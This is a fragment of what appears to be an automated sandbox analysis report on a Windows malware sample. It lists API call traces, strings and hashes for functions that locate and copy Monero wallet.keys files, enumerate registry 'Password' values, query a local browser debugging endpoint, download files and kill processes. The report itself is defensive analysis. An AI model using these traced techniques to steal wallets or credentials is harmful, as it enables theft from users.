                                  • Part of subcall function 00EA12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA12B4
                                  • Part of subcall function 00EA12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00EA12BB
                                  • Part of subcall function 00EA12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EA12D7
                                  • Part of subcall function 00EA12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EA12F5
                                  • Part of subcall function 00EA12A0: RegCloseKey.ADVAPI32(?), ref: 00EA12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00EA134F
                                • lstrlen.KERNEL32(?), ref: 00EA135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00EA1377
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBABB0: lstrcpy.KERNEL32(?,00EC0E1A), ref: 00EBAC15
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
                                  • Part of subcall function 00EBAC30: lstrcat.KERNEL32(00000000), ref: 00EBAC92
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00EA1465
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EAA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EAA13C
                                  • Part of subcall function 00EAA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EAA161
                                  • Part of subcall function 00EAA110: LocalAlloc.KERNEL32(00000040,?), ref: 00EAA181
                                  • Part of subcall function 00EAA110: ReadFile.KERNEL32(000000FF,?,00000000,00EA148F,00000000), ref: 00EAA1AA
                                  • Part of subcall function 00EAA110: LocalFree.KERNEL32(00EA148F), ref: 00EAA1E0
                                  • Part of subcall function 00EAA110: CloseHandle.KERNEL32(000000FF), ref: 00EAA1EA
                                • DeleteFileA.KERNEL32(00000000), ref: 00EA14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: c305e4e0cc97474c1e605904f0a3eb3dc7d719d9c2bb8e87d80826cf3aa0a8a0
                                • Instruction ID: d7688cf62ffc9faf4bf8febf24ee8a2f304a49906b3c0b1bde647a99dc96a01a
                                • Opcode Fuzzy Hash: c305e4e0cc97474c1e605904f0a3eb3dc7d719d9c2bb8e87d80826cf3aa0a8a0
                                • Instruction Fuzzy Hash: 1D5121B19502186BCF15EB60DD96FEE73BC9B54300F4455F8B60A72091EE306B89CFA6
                                Function 00EA9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenA.WININET(00EC0AF6,00000001,00000000,00000000,00000000), ref: 00EA9A6A
                                • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00EA9AAB
                                • InternetCloseHandle.WININET(00000000), ref: 00EA9AC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$Open$CloseHandle
                                • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                • API String ID: 3289985339-2144369209
                                • Opcode ID: 1791941eb94915dd58c95cf2ff15324b2b72491a4b41d9d01a5ae611552f2853
                                • Instruction ID: 7419a2316f858bff773dc0ef892afaa6ae88cab6844a1b28114e5585c057d2d6
                                • Opcode Fuzzy Hash: 1791941eb94915dd58c95cf2ff15324b2b72491a4b41d9d01a5ae611552f2853
                                • Instruction Fuzzy Hash: 1F413B35A10218EBDB14EBA4DD95FDEB7B8AB48740F105198F509BA191CBB1BE80CF64
                                Function 00EA7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EA7330: memset.MSVCRT ref: 00EA7374
                                  • Part of subcall function 00EA7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EA739A
                                  • Part of subcall function 00EA7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EA7411
                                  • Part of subcall function 00EA7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EA746D
                                  • Part of subcall function 00EA7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00EA74B2
                                  • Part of subcall function 00EA7330: HeapFree.KERNEL32(00000000), ref: 00EA74B9
                                • lstrcat.KERNEL32(00000000,00EC192C), ref: 00EA7666
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EA76A8
                                • lstrcat.KERNEL32(00000000, : ), ref: 00EA76BA
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EA76EF
                                • lstrcat.KERNEL32(00000000,00EC1934), ref: 00EA7700
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00EA7733
                                • lstrcat.KERNEL32(00000000,00EC1938), ref: 00EA774D
                                • task.LIBCPMTD ref: 00EA775B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: :
                                • API String ID: 3191641157-3653984579
                                • Opcode ID: 14acaef584f94fec420491dfeca994e60b057f2e0a21fd174ef16743055014ca
                                • Instruction ID: aedff3ae57ab4cd8f8f2387da59fd9aa90162c3525c2dedf1601e5ca4d5fc143
                                • Opcode Fuzzy Hash: 14acaef584f94fec420491dfeca994e60b057f2e0a21fd174ef16743055014ca
                                • Instruction Fuzzy Hash: 69316F75D00104DBDB18DBA0DD99DEEB3B8AB5A301F105128F122B7395CF34A986CB90
                                Function 00EA7330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 00EA7374
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00EA739A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00EA7411
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00EA746D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00EA74B2
                                • HeapFree.KERNEL32(00000000), ref: 00EA74B9
                                • task.LIBCPMTD ref: 00EA75B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                • String ID: Password
                                • API String ID: 2808661185-3434357891
                                • Opcode ID: 33ed91f6a2a78d0e5f11f60b2c91a48cb1a561e66bcd9425da2597193198f05f
                                • Instruction ID: 899bb9621001a1bd89b7273f4bf4333ae7740a49a904e7dd66790fd354f07844
                                • Opcode Fuzzy Hash: 33ed91f6a2a78d0e5f11f60b2c91a48cb1a561e66bcd9425da2597193198f05f
                                • Instruction Fuzzy Hash: 22612DB1D041589BDB24DB50CC55BDAB7B8BF59304F0091E9E689BA141EB706BC9CFA0
                                Function 00EA9E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EB8CF0: GetSystemTime.KERNEL32(00EC0E1B,01BFB730,00EC05B6,?,?,00EA13F9,?,0000001A,00EC0E1B,00000000,?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EB8D16
                                • wsprintfA.USER32 ref: 00EA9E7F
                                • memset.MSVCRT ref: 00EA9EED
                                • lstrcat.KERNEL32(00000000,?), ref: 00EA9F03
                                • lstrcat.KERNEL32(00000000,?), ref: 00EA9F17
                                • lstrcat.KERNEL32(00000000,00EC12D8), ref: 00EA9F29
                                • lstrcpy.KERNEL32(?,00000000), ref: 00EA9F7C
                                • memset.MSVCRT ref: 00EA9F9C
                                • Sleep.KERNEL32(00001388), ref: 00EAA013
                                  • Part of subcall function 00EB99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00EB99C5
                                  • Part of subcall function 00EB99A0: Process32First.KERNEL32(00EAA056,00000128), ref: 00EB99D9
                                  • Part of subcall function 00EB99A0: Process32Next.KERNEL32(00EAA056,00000128), ref: 00EB99F2
                                  • Part of subcall function 00EB99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EB9A4E
                                  • Part of subcall function 00EB99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 00EB9A6C
                                  • Part of subcall function 00EB99A0: CloseHandle.KERNEL32(00000000), ref: 00EB9A79
                                  • Part of subcall function 00EB99A0: CloseHandle.KERNEL32(00EAA056), ref: 00EB9A88
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                • String ID: D
                                • API String ID: 3242155833-2746444292
                                • Opcode ID: 0e1efae0e5c77e19c6257255642288873bb08f704b13172ce7dc70606cc45e90
                                • Instruction ID: 2128af3f62d5cb95026d39b3fc12e3a97b1bdf047787e2a229b49da413aad42c
                                • Opcode Fuzzy Hash: 0e1efae0e5c77e19c6257255642288873bb08f704b13172ce7dc70606cc45e90
                                • Instruction Fuzzy Hash: 3A5188B1940318ABEB24DB60DC4AFDA77B8AF44704F0445A8F61DAB2C1DB75AB84CF51
                                Function 00EA60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00EBAAF6
                                  • Part of subcall function 00EA4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EA4889
                                  • Part of subcall function 00EA4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EA4899
                                • InternetOpenA.WININET(00EC0DFB,00000001,00000000,00000000,00000000), ref: 00EA615F
                                • StrCmpCA.SHLWAPI(?,01BFF7D0), ref: 00EA6197
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00EA61DF
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00EA6203
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00EA622C
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00EA625A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00EA6299
                                • InternetCloseHandle.WININET(?), ref: 00EA62A3
                                • InternetCloseHandle.WININET(00000000), ref: 00EA62B0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: f9d3a1122b6d1c5b0e29ae0917c34cb796c4d03304464ad1b2599ba723cd74c6
                                • Instruction ID: 1cc017f8c649c513f9e89fd9559207826a61d22b5f96c51534aa330604f87075
                                • Opcode Fuzzy Hash: f9d3a1122b6d1c5b0e29ae0917c34cb796c4d03304464ad1b2599ba723cd74c6
                                • Instruction Fuzzy Hash: B05186B1A00218ABDF24DFA0DC49FEE7779AB45305F0454A8F605BB1C0DB746A85CFA5
                                Function 00F2012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • type_info::operator==.LIBVCRUNTIME ref: 00F2024D
                                • ___TypeMatch.LIBVCRUNTIME ref: 00F2035B
                                • CatchIt.LIBVCRUNTIME ref: 00F203AC
                                • CallUnexpected.LIBVCRUNTIME ref: 00F204C8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                • String ID: csm$csm$csm
                                • API String ID: 2356445960-393685449
                                • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                • Instruction ID: 24993229c2d44b05feac8b3193a11663e7526da7765f34189f7cd9053785573b
                                • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                • Instruction Fuzzy Hash: C1B18072C00229EFCF15EFA4E8419AEBB75BF14320F10815AE9116B253DB34DE51EB91
                                Function 00EB78B0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EB78C4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EB78CB
                                • RegOpenKeyExA.ADVAPI32(80000002,01BECE80,00000000,00020119,Ix), ref: 00EB78EB
                                • RegQueryValueExA.ADVAPI32(Ix,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EB790A
                                • RegCloseKey.ADVAPI32(Ix), ref: 00EB7914
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1810537385.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true
                                • Associated: 00000000.00000002.1810488861.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000ECC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000000FE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1810537385.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001313000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.00000000013F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.000000000141C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001424000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811413269.0000000001432000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811701261.0000000001433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811822336.00000000015D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1811841340.00000000015D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ea0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber$Ix
                                • API String ID: 3225020163-4041952297
                                • Opcode ID: d968c878aa3d6b040c207256c2b5a1c43d6676f96761ae60ba115164db311523
                                • Instruction ID: f4037115c3c19f2c39eea7a6cd223b94a3f70d4b8798d3e42fab4292a9f094bb
                                • Opcode Fuzzy Hash: d968c878aa3d6b040c207256c2b5a1c43d6676f96761ae60ba115164db311523
                                • Instruction Fuzzy Hash: 280112B5A40309BFEB14DBE4DD4AFAEB7B8EB44700F1045A8F625A7385D7706A40CB90
                                Function 00EABA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EBAA50: lstrcpy.KERNEL32(00EC0E1A,00000000), ref: 00EBAA98
                                  • Part of subcall function 00EBACC0: lstrlen.KERNEL32(?,01BF9FE8,?,\Monero\wallet.keys,00EC0E1A), ref: 00EBACD5
                                  • Part of subcall function 00EBACC0: lstrcpy.KERNEL32(00000000), ref: 00EBAD14
                                  • Part of subcall function 00EBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00EBAD22
                                  • Part of subcall function 00EBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00EBAC82
